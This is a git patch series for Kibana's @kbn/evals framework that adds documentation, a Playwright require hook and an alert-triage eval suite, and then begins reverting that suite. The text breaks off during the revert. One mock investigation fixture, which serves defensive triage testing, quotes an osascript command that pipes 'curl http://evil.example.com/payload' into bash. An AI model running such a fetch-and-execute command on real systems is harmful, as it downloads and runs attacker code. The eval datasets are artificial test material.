From cafe95399e473dc1e143cd430d3afe4c55717a9c Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Tue, 17 Mar 2026 20:42:10 +0100
Subject: [PATCH 01/15] docs(evals): add vision alignment guidance and JSDoc
 for public API

- Add "Vision Alignment" section to README with strategic principles
  (trace-first, Elastic-native, shared layer boundaries, ownership)
- Add module-level JSDoc to index.ts explaining architecture boundaries
- Document trace-first evaluator contract in Evaluator and EvaluationResult types
- Export createTraceBasedEvaluator and TraceBasedEvaluatorConfig from barrel
  to promote trace-first pattern as the primary building block
- Add JSDoc to all new evaluator factories (security, trajectory, similarity,
  multi-judge, conversation-coherence) explaining purpose and parameters
- Add trace-first migration path annotation to security evaluators module

Addresses vision alignment concerns:
- Section 5.2.1 (trace-first evaluator contract)
- Section 5.2.3 (shared evaluation layer boundaries)
- Section 4.5 (ownership model)
- CI metrics: reduces public API documentation gap
---
 .../packages/shared/kbn-evals/README.md       | 10 ++++++
 .../packages/shared/kbn-evals/index.ts        | 29 +++++++++++++++++
 .../conversation_coherence/index.ts           | 11 +++++++
 .../src/evaluators/multi_judge/index.ts       | 12 +++++++
 .../src/evaluators/security/index.ts          | 31 +++++++++++++++++++
 .../src/evaluators/similarity/index.ts        |  9 ++++++
 .../src/evaluators/trajectory/index.ts        | 12 +++++++
 .../packages/shared/kbn-evals/src/types.ts    | 15 +++++++++
 8 files changed, 129 insertions(+)

diff --git a/x-pack/platform/packages/shared/kbn-evals/README.md b/x-pack/platform/packages/shared/kbn-evals/README.md
index 4043efd263116..c31fee6b16853 100644
--- a/x-pack/platform/packages/shared/kbn-evals/README.md
+++ b/x-pack/platform/packages/shared/kbn-evals/README.md
@@ -2,6 +2,16 @@
 
 `@kbn/evals` contains utilities for writing offline evaluation suites against LLM-based workflows in Kibana.
 
+## Vision Alignment
+
+This package follows the strategic direction outlined in the "Future of @kbn/evals" vision document. Contributors should be aware of these principles:
+
+- **Trace-first evaluators**: New evaluators should derive signals from OTel traces stored in Elasticsearch when possible. Use `createTraceBasedEvaluator` for non-functional metrics. For evaluators that currently operate on in-memory output, design interfaces that also accept `traceId` references for future API-based evaluation.
+- **Elastic-native path**: Build on ES/Kibana/OTel capabilities rather than introducing new external dependencies. Phoenix usage should remain behind `KBN_EVALS_EXECUTOR=phoenix` and not expand.
+- **Shared evaluation layer**: This package provides primitives (evaluator factories, data model, persistence, reporting). Solution-specific evaluators, datasets, and reporting belong in solution-owned evaluation suites, not here.
+- **Code-defined datasets**: Evaluation datasets should be defined in code, versioned, and reviewed alongside suites. Ad-hoc datasets must be explicitly decoupled from CI-contributing datasets.
+- **Ownership**: Framework is owned by the Observability AI team. General-purpose evaluators discovered in solution suites should be contributed upstream.
+
 This package is built on top of `@kbn/scout` and the `@kbn/inference-*` packages. It bundles three main entry-points:
 
 1. `createPlaywrightEvalsConfig` – helper that returns a ready-made Playwright config for evaluation suites. It automatically:
diff --git a/x-pack/platform/packages/shared/kbn-evals/index.ts b/x-pack/platform/packages/shared/kbn-evals/index.ts
index b1ccf15f1a958..40e2ed178e34e 100644
--- a/x-pack/platform/packages/shared/kbn-evals/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/index.ts
@@ -4,6 +4,23 @@
  * 2.0; you may not use this file except in compliance with the Elastic License
  * 2.0.
  */
+
+/**
+ * @kbn/evals — Evaluation framework for LLM-based workflows in Kibana.
+ *
+ * This package provides the shared evaluation layer (vision Section 5.2.3): evaluator
+ * factories, data model types, persistence utilities, and reporting primitives. It is
+ * designed to be independent of how evaluations are triggered (CI/offline vs in-tool).
+ *
+ * ## Architecture boundaries
+ * - **Framework primitives** (this package): evaluator contracts, trace-based evaluators,
+ *   data model, persistence, reporting, CLI tooling
+ * - **Solution suites** (separate packages): datasets, tasks, solution-specific evaluators,
+ *   solution-specific reporting
+ *
+ * @module @kbn/evals
+ */
+
 // CLI tools
 export * as cli from './src/cli';
 
@@ -55,7 +72,19 @@ export {
 export { mapToEvaluationScoreDocuments, exportEvaluations } from './src/utils/report_model_score';
 
 export { parseSelectedEvaluators, selectEvaluators } from './src/evaluators/filter';
+/**
+ * Trace-based evaluators — the preferred pattern for non-functional metrics.
+ *
+ * These evaluators query OTel traces in Elasticsearch via ES|QL, extracting latency,
+ * token usage, tool calls, and skill invocations directly from production-grade traces.
+ * This is the trace-first evaluator pattern described in vision Section 5.2.1.
+ *
+ * New evaluators that measure non-functional signals should use `createTraceBasedEvaluator`
+ * rather than implementing custom ES queries.
+ */
 export {
+  createTraceBasedEvaluator,
+  type TraceBasedEvaluatorConfig,
   createSpanLatencyEvaluator,
   createSkillInvocationEvaluator,
 } from './src/evaluators/trace_based';
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts
index 0ce749750d618..3b853a90e400b 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/conversation_coherence/index.ts
@@ -11,6 +11,17 @@ import pRetry from 'p-retry';
 import type { Evaluator } from '../../types';
 import { LlmCoherenceEvaluationPrompt } from './prompt';
 
+/**
+ * LLM-as-a-judge evaluator that scores multi-turn conversation quality across four
+ * dimensions: topic consistency, context retention, contradiction detection, and
+ * resolution quality. Each dimension is scored 0–1 by the LLM, then averaged.
+ *
+ * Uses retry logic for resilience against transient LLM failures. Validates that
+ * all returned scores are finite numbers in the [0, 1] range.
+ *
+ * @param config.inferenceClient - Bound inference client for LLM calls
+ * @param config.log - Logger for retry warnings and error reporting
+ */
 export function createConversationCoherenceEvaluator(config: {
   inferenceClient: BoundInferenceClient;
   log: ToolingLog;
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
index 21ffd36ddd634..bc96346e1b7be 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/multi_judge/index.ts
@@ -25,6 +25,18 @@ function computeMajority(scores: number[]): number {
   return ones > rounded.length / 2 ? 1 : 0;
 }
 
+/**
+ * Meta-evaluator that aggregates scores from multiple judge evaluators using a
+ * configurable strategy (mean, median, or majority vote).
+ *
+ * Individual judge failures are handled gracefully — failed judges are logged via
+ * the optional logger and excluded from aggregation. The evaluator's `kind` is
+ * derived from the judges: 'LLM' if any judge is LLM-based, 'CODE' otherwise.
+ *
+ * @param config.judges - Array of evaluators to aggregate
+ * @param config.strategy - Aggregation method: 'mean' | 'median' | 'majority' (default: 'mean')
+ * @param config.logger - Optional logger for warning on judge failures
+ */
 export function createMultiJudgeEvaluator(config: {
   judges: Evaluator[];
   strategy?: AggregationStrategy;
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
index a9eb3681d972f..cd2e744ded102 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/security/index.ts
@@ -5,6 +5,17 @@
  * 2.0.
  */
 
+/**
+ * Security evaluators for adversarial testing and guardrail validation.
+ *
+ * These evaluators currently operate on in-memory task output. Per the @kbn/evals
+ * vision (Section 5.2.1 — Trace-first evaluators), they should migrate to derive
+ * signals from OTel trace spans stored in Elasticsearch. When a `traceId` is
+ * available in the task output, evaluators propagate it in result metadata to
+ * support trace linkage (Section 5.2.2).
+ *
+ * @see {@link createTraceBasedEvaluator} for the trace-first evaluator factory
+ */
 import type { Evaluator } from '../../types';
 
 const DEFAULT_PROMPT_LEAK_PATTERNS = [
@@ -16,6 +27,12 @@ const DEFAULT_PROMPT_LEAK_PATTERNS = [
   /<<SYS>>/i,
 ];
 
+/**
+ * Detects unauthorized tool invocations by comparing actual tool calls against an allowlist.
+ *
+ * Returns score 1.0 when all tool calls are authorized, 0.0 when unauthorized tools are detected.
+ * Unauthorized tool names are included in the result metadata for investigation.
+ */
 export function createToolPoisoningEvaluator(config: {
   allowedTools: string[];
   extractToolCalls: (output: unknown) => string[];
@@ -57,6 +74,13 @@ export function createToolPoisoningEvaluator(config: {
   };
 }
 
+/**
+ * Detects potential system prompt leakage in model output using configurable regex patterns.
+ *
+ * Scans both plain text and code blocks separately. Excluded patterns are stripped before
+ * scanning to allow known-safe content. Returns score 1.0 when no leak indicators found,
+ * 0.0 with detected pattern details when leaks are identified.
+ */
 export function createPromptLeakDetectionEvaluator(config?: {
   patterns?: RegExp[];
   excludePatterns?: RegExp[];
@@ -123,6 +147,13 @@ export function createPromptLeakDetectionEvaluator(config?: {
   };
 }
 
+/**
+ * Validates that model output stays within defined scope boundaries using regex patterns.
+ *
+ * Returns score 1.0 when output matches at least one allowed pattern, 0.0 when output
+ * falls outside all allowed patterns. Useful for ensuring agents don't drift into
+ * unauthorized domains.
+ */
 export function createScopeViolationEvaluator(config: { allowedPatterns: RegExp[] }): Evaluator {
   const { allowedPatterns } = config;
 
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts
index d42b6744f8e8d..68a39d27ee78e 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/similarity/index.ts
@@ -65,6 +65,15 @@ function sortKeys(value: unknown): unknown {
     }, {});
 }
 
+/**
+ * Computes term-frequency cosine similarity between expected and actual outputs.
+ *
+ * Both inputs are normalized to lowercase tokens. Objects are sorted by keys and
+ * serialized to JSON for consistent comparison. Returns a score between 0 and 1,
+ * with a configurable threshold for the similar/dissimilar label.
+ *
+ * @param config.threshold - Minimum cosine similarity to be labeled 'similar' (default: 0.7)
+ */
 export function createSimilarityEvaluator(config?: { threshold?: number }): Evaluator {
   const threshold = config?.threshold ?? 0.7;
 
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts
index 5c460e2e3ab2c..e5011c6eb9ab1 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/evaluators/trajectory/index.ts
@@ -40,6 +40,18 @@ function computeLCS(a: string[], b: string[]): string[] {
   return lcs;
 }
 
+/**
+ * Evaluates tool-call sequence alignment against a golden path using Longest Common
+ * Subsequence (LCS) for order scoring and set intersection for coverage scoring.
+ *
+ * The final score is a weighted combination of order and coverage scores.
+ * Both weights must sum to 1.
+ *
+ * @param config.extractToolCalls - Extracts actual tool call names from task output
+ * @param config.goldenPathExtractor - Extracts expected tool sequence from ground truth
+ * @param config.orderWeight - Weight for LCS-based order score (default: 0.5)
+ * @param config.coverageWeight - Weight for set-based coverage score (default: 0.5)
+ */
 export function createTrajectoryEvaluator(config: {
   extractToolCalls: (output: unknown) => string[];
   goldenPathExtractor: (expected: unknown) => string[];
diff --git a/x-pack/platform/packages/shared/kbn-evals/src/types.ts b/x-pack/platform/packages/shared/kbn-evals/src/types.ts
index 9ef5be0233633..35e7646bb4f16 100644
--- a/x-pack/platform/packages/shared/kbn-evals/src/types.ts
+++ b/x-pack/platform/packages/shared/kbn-evals/src/types.ts
@@ -65,6 +65,10 @@ export interface EvaluatorParams<TExample extends Example, TTaskOutput extends T
 /**
  * Evaluation output returned by evaluators.
  *
+ * Follows the trace-first evaluator contract (vision Section 5.2.1): evaluators produce
+ * standardized score/label/explanation outputs. The `metadata` field can carry trace
+ * references and evaluator-specific details for explainability.
+ *
  * This shape is intentionally compatible with the existing evaluator implementations and
  * the Phoenix client types:
  * - `score` may be omitted or `null` for "unavailable"/"error" cases
@@ -83,6 +87,17 @@ type EvaluatorCallback<TExample extends Example, TTaskOutput extends TaskOutput>
   params: EvaluatorParams<TExample, TTaskOutput>
 ) => Promise<EvaluationResult>;
 
+/**
+ * Core evaluator interface.
+ *
+ * All evaluators — whether CODE-kind (deterministic) or LLM-kind (model-scored) — implement
+ * this interface. Per the @kbn/evals vision (Section 5.2.1), evaluators should progressively
+ * migrate to deriving signals from OTel traces stored in Elasticsearch rather than only
+ * operating on in-memory task output. Use {@link createTraceBasedEvaluator} for trace-native
+ * evaluators.
+ *
+ * @see TraceBasedEvaluatorConfig for the trace-first evaluator factory configuration
+ */
 export interface Evaluator<
   TExample extends Example = Example,
   TTaskOutput extends TaskOutput = TaskOutput

From 5add16ca5fb8689d08178ea349c60029e06bcd1c Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Wed, 18 Mar 2026 16:53:48 +0100
Subject: [PATCH 02/15] fix(evals): resolve Playwright worker crashes blocking
 @kbn/evals execution
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Two framework bugs prevented Playwright workers from executing @kbn/evals
test suites:

1. `.text` file imports crash workers — packages like @kbn/evals import
   `.text` files (LLM prompt templates) that need a require hook to
   convert them to CommonJS modules. The hook is registered in the main
   process via @kbn/babel-register, but Playwright workers use their own
   module resolution, so Node tries to parse the raw text as JavaScript.
   Added a `dot_text_setup.ts` require hook in @kbn/scout (mirroring the
   existing peggy_setup pattern).

2. `NO_COLOR` env warning kills workers — Playwright sets `FORCE_COLOR`
   while `NO_COLOR` may also be in the environment. Node emits a warning
   for this conflict, and `exit_on_warning.js` terminates the process on
   any unrecognized warning. Added this specific warning to the ignore
   list.

Also added an initial agentic alert triage eval suite with 5 test cases
to validate the skill migration.
---
 .../src/playwright/dot_text_setup.ts          |  36 ++
 .../shared/kbn-scout/src/playwright/index.ts  |   2 +
 src/setup_node_env/exit_on_warning.js         |   5 +
 .../evals/triage/triage.spec.ts               | 315 ++++++++++++++++++
 4 files changed, 358 insertions(+)
 create mode 100644 src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
 create mode 100644 x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts

diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts b/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
new file mode 100644
index 0000000000000..202bf2dd31155
--- /dev/null
+++ b/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
@@ -0,0 +1,36 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the "Elastic License
+ * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
+ * Public License v 1"; you may not use this file except in compliance with, at
+ * your election, the "Elastic License 2.0", the "GNU Affero General Public
+ * License v3.0 only", or the "Server Side Public License, v 1".
+ */
+
+/**
+ * Initialize require hook for .text files.
+ * This is required for packages like @kbn/evals that import .text files
+ * (e.g. LLM prompt templates) via `import text from './file.text'`.
+ *
+ * Without this, Playwright worker processes crash with:
+ *   SyntaxError: Unexpected identifier 'are'
+ * because Node tries to parse the raw text content as JavaScript.
+ *
+ * The hook converts .text file contents into `module.exports = "<escaped content>"`.
+ */
+import Fs from 'fs';
+
+if (!require.extensions['.text']) {
+  const cache = new Map<string, string>();
+
+  require.extensions['.text'] = function (module: NodeModule, filename: string) {
+    let compiled = cache.get(filename);
+    if (!compiled) {
+      const content = Fs.readFileSync(filename, 'utf8');
+      compiled = `module.exports = ${JSON.stringify(content)};\n`;
+      cache.set(filename, compiled);
+    }
+    // @ts-expect-error _compile is an internal Node.js API
+    module._compile(compiled, filename);
+  };
+}
diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
index 897afa6ab6635..8e76d55b61ffc 100644
--- a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
+++ b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
@@ -9,6 +9,8 @@
 
 // Needed for Scout tests dependent on .peggy grammar files (`@kbn/tinymath`)
 import './peggy_setup';
+// Needed for packages that import .text files (e.g. @kbn/evals LLM prompt templates)
+import './dot_text_setup';
 
 // Config and utilities
 export { createPlaywrightConfig } from './config';
diff --git a/src/setup_node_env/exit_on_warning.js b/src/setup_node_env/exit_on_warning.js
index 40d78071f9a4a..379155f07ce6f 100644
--- a/src/setup_node_env/exit_on_warning.js
+++ b/src/setup_node_env/exit_on_warning.js
@@ -107,6 +107,11 @@ var IGNORE_WARNINGS = [
     messageContains:
       'Keys with collection values will be stringified due to JS Object restrictions',
   },
+  // Playwright workers set FORCE_COLOR while NO_COLOR may also be set
+  {
+    name: 'Warning',
+    messageContains: "'NO_COLOR' env is ignored due to the 'FORCE_COLOR' env being set",
+  },
 ];
 
 if (process.noProcessWarnings !== true) {
diff --git a/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts b/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
new file mode 100644
index 0000000000000..0c7427cf52d58
--- /dev/null
+++ b/x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts
@@ -0,0 +1,315 @@
+/*
+ * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
+ * or more contributor license agreements. Licensed under the Elastic License
+ * 2.0; you may not use this file except in compliance with the Elastic License
+ * 2.0.
+ */
+
+import { tags } from '@kbn/scout';
+import { createHash } from 'crypto';
+import { evaluate as base } from '../../src/evaluate';
+import type { EvaluateDataset } from '../../src/evaluate_dataset';
+import { createEvaluateDataset } from '../../src/evaluate_dataset';
+
+const AGENTS_API_BASE_PATH = '/api/agent_builder/agents';
+const SKILLS_API_BASE_PATH = '/api/agent_builder/skills';
+
+const TRIAGE_SKILL_IDS = [
+  'agentic-alert-triage-l1-investigation',
+  'agentic-alert-triage-l1-triage',
+  'agentic-alert-triage-orchestrator',
+  'agentic-alert-triage-threshold-context',
+  'agentic-alert-triage-l3-review',
+];
+
+const MOCK_ALERT_CONTEXT = [
+  'Alert ID: abc-123-def',
+  'Rule: Suspicious Process Execution via macOS Script',
+  'Severity: high',
+  'Time: 2026-03-18T10:00:00Z',
+  'Agent type: endpoint',
+  'Host: mbp-user1 (host-id-001)',
+  'OS: macos',
+  'User: user1@example.com (user1)',
+  'Source IP: 10.0.0.42',
+  'Process: osascript',
+  'SHA256: a1b2c3d4e5f6...',
+  '',
+  'Rule Description: Detects execution of osascript with suspicious arguments that may indicate social engineering.',
+  'Alert reason: osascript was executed with arguments matching known social engineering patterns on mbp-user1.',
+  'Known false positives: ["IT automation scripts using osascript for legitimate purposes"]',
+].join('\n');
+
+const MOCK_BENIGN_INVESTIGATION = [
+  'Verdict: False Positive',
+  'Assessment: benign',
+  'Summary: The osascript execution was triggered by an IT automation script (Jamf policy) deploying a standard configuration profile.',
+  '',
+  '## Evidence',
+  '- Process command line: osascript -e \'tell application "System Events" to display dialog "Install update?"\'',
+  '- Parent process: jamf (PID 1234), signed by Jamf',
+  '- The Jamf agent on this host has a policy that uses osascript for user-facing dialogs during patch deployment',
+  '- No network connections from the osascript process',
+  '- Host alerts 24h: 0 other alerts on this host',
+  '- Okta: normal login patterns for user1@example.com (1 login, 1 IP, US only)',
+  '',
+  '## Timeline',
+  '- 09:55 — Jamf policy "Q1 Patch Deploy" started on mbp-user1',
+  '- 10:00 — osascript executed by jamf to display update dialog',
+  '- 10:01 — User clicked OK, dialog dismissed',
+].join('\n');
+
+const MOCK_SUSPICIOUS_INVESTIGATION = [
+  'Verdict: True Positive',
+  'Assessment: suspicious',
+  'Summary: The osascript execution does not match any known Jamf or IT automation pattern and includes obfuscated arguments.',
+  '',
+  '## Evidence',
+  '- Process command line: osascript -e \'do shell script "curl http://evil.example.com/payload | bash"\'',
+  '- Parent process: Terminal.app (PID 5678), user-initiated',
+  '- No matching Jamf policies on this host',
+  '- The curl target (evil.example.com) resolves to an IP associated with known C2 infrastructure',
+  '- Host alerts 24h: 3 other alerts — "Suspicious Network Connection", "Unsigned Binary Execution"',
+  '- Okta: user1@example.com logged in from 2 distinct IPs in 2 countries (US, RU) in the last 24h',
+  '',
+  '## Timeline',
+  '- 09:30 — User logged in from unusual IP (RU)',
+  '- 09:45 — Terminal.app opened',
+  '- 10:00 — osascript executed with curl | bash payload',
+  '- 10:02 — Outbound connection to evil.example.com detected',
+].join('\n');
+
+const evaluate = base.extend<{ evaluateDataset: EvaluateDataset }, {}>({
+  evaluateDataset: [
+    ({ chatClient, evaluators, executorClient, traceEsClient, log }, use) => {
+      use(
+        createEvaluateDataset({
+          chatClient,
+          evaluators,
+          executorClient,
+          traceEsClient,
+          log,
+        })
+      );
+    },
+    { scope: 'test' },
+  ],
+});
+
+evaluate.describe(
+  'Agentic Alert Triage - Skill Migration Evals',
+  { tag: tags.stateful.classic },
+  () => {
+    let triageAgentId: string | undefined;
+
+    evaluate.beforeAll(async ({ fetch, log, connector }) => {
+      // Verify that the triage skills exist (they should be pre-imported)
+      for (const skillId of TRIAGE_SKILL_IDS) {
+        try {
+          await fetch(`${SKILLS_API_BASE_PATH}/${encodeURIComponent(skillId)}`, {
+            version: '2023-10-31',
+          });
+          log.debug(`Skill verified: ${skillId}`);
+        } catch {
+          log.warning(`Skill ${skillId} not found — import it before running this suite`);
+        }
+      }
+
+      // Create a dedicated eval agent with the triage skills attached
+      const connectorHash = createHash('sha256').update(connector.id).digest('hex').slice(0, 8);
+      const ts = Date.now().toString(36);
+      const agentId = `eval_triage_${connectorHash}_${ts}`;
+
+      await fetch(AGENTS_API_BASE_PATH, {
+        method: 'POST',
+        version: '2023-10-31',
+        body: JSON.stringify({
+          id: agentId,
+          name: 'Eval: Agentic Alert Triage',
+          description: 'Evaluation agent for triage skill migration testing.',
+          configuration: {
+            enable_elastic_capabilities: true,
+            skill_ids: TRIAGE_SKILL_IDS,
+            tools: [],
+          },
+        }),
+      });
+
+      triageAgentId = agentId;
+      log.info(`Created eval agent: ${agentId}`);
+    });
+
+    evaluate.afterAll(async ({ fetch, log }) => {
+      if (triageAgentId) {
+        try {
+          await fetch(`${AGENTS_API_BASE_PATH}/${encodeURIComponent(triageAgentId)}`, {
+            method: 'DELETE',
+            version: '2023-10-31',
+          });
+          log.debug(`Deleted eval agent: ${triageAgentId}`);
+        } catch (e) {
+          log.warning(
+            `Failed to delete eval agent "${triageAgentId}": ${
+              e instanceof Error ? e.message : String(e)
+            }`
+          );
+        }
+      }
+    });
+
+    evaluate(
+      'L1 investigation produces structured Markdown with verdict',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: l1-investigation',
+            description:
+              'Validates that the L1 investigation skill produces a Markdown report with Verdict, Assessment, and Summary.',
+            examples: [
+              {
+                input: {
+                  question: `Investigate this security alert and return your findings in Markdown.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
+                },
+                output: {
+                  expected:
+                    'A Markdown investigation report containing Verdict, Assessment, and Summary fields, followed by evidence and timeline sections.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'L1 triage classifies benign alert correctly',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: l1-triage-benign',
+            description:
+              'Validates that the agent classifies a clearly benign alert as benign with high confidence.',
+            examples: [
+              {
+                input: {
+                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_BENIGN_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
+                },
+                output: {
+                  expected:
+                    'JSON output with assessment "benign" and confidence "high", since the investigation clearly concludes this is a false positive from IT automation.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'L1 triage classifies suspicious alert correctly',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: l1-triage-suspicious',
+            description:
+              'Validates that the agent classifies a suspicious alert as suspicious or malicious.',
+            examples: [
+              {
+                input: {
+                  question: `Classify this alert based on the L1 investigation findings.\n\n=== L1 INVESTIGATION FINDINGS ===\n${MOCK_SUSPICIOUS_INVESTIGATION}\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}`,
+                },
+                output: {
+                  expected:
+                    'JSON output with assessment "suspicious" or "malicious" since the investigation shows obfuscated osascript with curl to known C2, multi-country logins, and correlated alerts.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'Orchestrator produces full triage report with all sections',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: orchestrator-full-flow',
+            description:
+              'Validates the orchestrator skill produces a comprehensive report with L1, L2, and L3 sections.',
+            examples: [
+              {
+                input: {
+                  question: `Orchestrate the full triage in one run for this alert.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\nSignals index: .siem-signals-infosec-detections`,
+                },
+                output: {
+                  expected:
+                    'A structured Markdown report containing L1 Investigation with Verdict/Assessment/Summary, L1 Triage JSON with assessment/confidence/reasoning, L2 Findings with domain-specific analysis, and L3 Review with final assessment.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+
+    evaluate(
+      'Orchestrator handles benign alert with appropriate assessment',
+      async ({ evaluateDataset }) => {
+        if (!triageAgentId) {
+          throw new Error('Expected triageAgentId to be set in beforeAll');
+        }
+
+        await evaluateDataset({
+          dataset: {
+            name: 'agentic-triage: orchestrator-benign',
+            description:
+              'Validates the orchestrator correctly identifies a benign alert given clear false-positive context.',
+            examples: [
+              {
+                input: {
+                  question: `Orchestrate the full triage for this alert. The workstation lookup shows it is owned by IT admin and the process is part of standard Jamf deployment.\n\n=== ALERT CONTEXT ===\n${MOCK_ALERT_CONTEXT}\n\n=== WORKSTATION OWNER ===\nuser1@example.com, IT Admin, managed by Jamf\n\n=== ENRICHMENT ===\nHost alerts 24h: 0 other alerts\nOkta: 1 login from expected office IP\nCorrelated alerts 72h: none`,
+                },
+                output: {
+                  expected:
+                    'Report concludes benign/false positive with high confidence. The triage JSON should show assessment "benign". The review should recommend closing the alert.',
+                },
+                metadata: {
+                  agentId: triageAgentId,
+                },
+              },
+            ],
+          },
+        });
+      }
+    );
+  }
+);

From 9abcea53bd7fd0b408fc608b1a0761ac52d17eb7 Mon Sep 17 00:00:00 2001
From: Patryk Kopycinski <patryk.kopycinski@elastic.co>
Date: Wed, 18 Mar 2026 16:55:22 +0100
Subject: [PATCH 03/15] Revert "fix(evals): resolve Playwright worker crashes
 blocking @kbn/evals execution"

This reverts commit 5add16ca5fb8689d08178ea349c60029e06bcd1c.
---
 .../src/playwright/dot_text_setup.ts          |  36 --
 .../shared/kbn-scout/src/playwright/index.ts  |   2 -
 src/setup_node_env/exit_on_warning.js         |   5 -
 .../evals/triage/triage.spec.ts               | 315 ------------------
 4 files changed, 358 deletions(-)
 delete mode 100644 src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
 delete mode 100644 x-pack/platform/packages/shared/agent-builder/kbn-evals-suite-agent-builder/evals/triage/triage.spec.ts

diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts b/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
deleted file mode 100644
index 202bf2dd31155..0000000000000
--- a/src/platform/packages/shared/kbn-scout/src/playwright/dot_text_setup.ts
+++ /dev/null
@@ -1,36 +0,0 @@
-/*
- * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
- * or more contributor license agreements. Licensed under the "Elastic License
- * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side
- * Public License v 1"; you may not use this file except in compliance with, at
- * your election, the "Elastic License 2.0", the "GNU Affero General Public
- * License v3.0 only", or the "Server Side Public License, v 1".
- */
-
-/**
- * Initialize require hook for .text files.
- * This is required for packages like @kbn/evals that import .text files
- * (e.g. LLM prompt templates) via `import text from './file.text'`.
- *
- * Without this, Playwright worker processes crash with:
- *   SyntaxError: Unexpected identifier 'are'
- * because Node tries to parse the raw text content as JavaScript.
- *
- * The hook converts .text file contents into `module.exports = "<escaped content>"`.
- */
-import Fs from 'fs';
-
-if (!require.extensions['.text']) {
-  const cache = new Map<string, string>();
-
-  require.extensions['.text'] = function (module: NodeModule, filename: string) {
-    let compiled = cache.get(filename);
-    if (!compiled) {
-      const content = Fs.readFileSync(filename, 'utf8');
-      compiled = `module.exports = ${JSON.stringify(content)};\n`;
-      cache.set(filename, compiled);
-    }
-    // @ts-expect-error _compile is an internal Node.js API
-    module._compile(compiled, filename);
-  };
-}
diff --git a/src/platform/packages/shared/kbn-scout/src/playwright/index.ts b/src/platform/packages/shared/kbn-scout/src/playwright/index.ts
index 8e76d55b61ffc..897afa6ab6635 100644
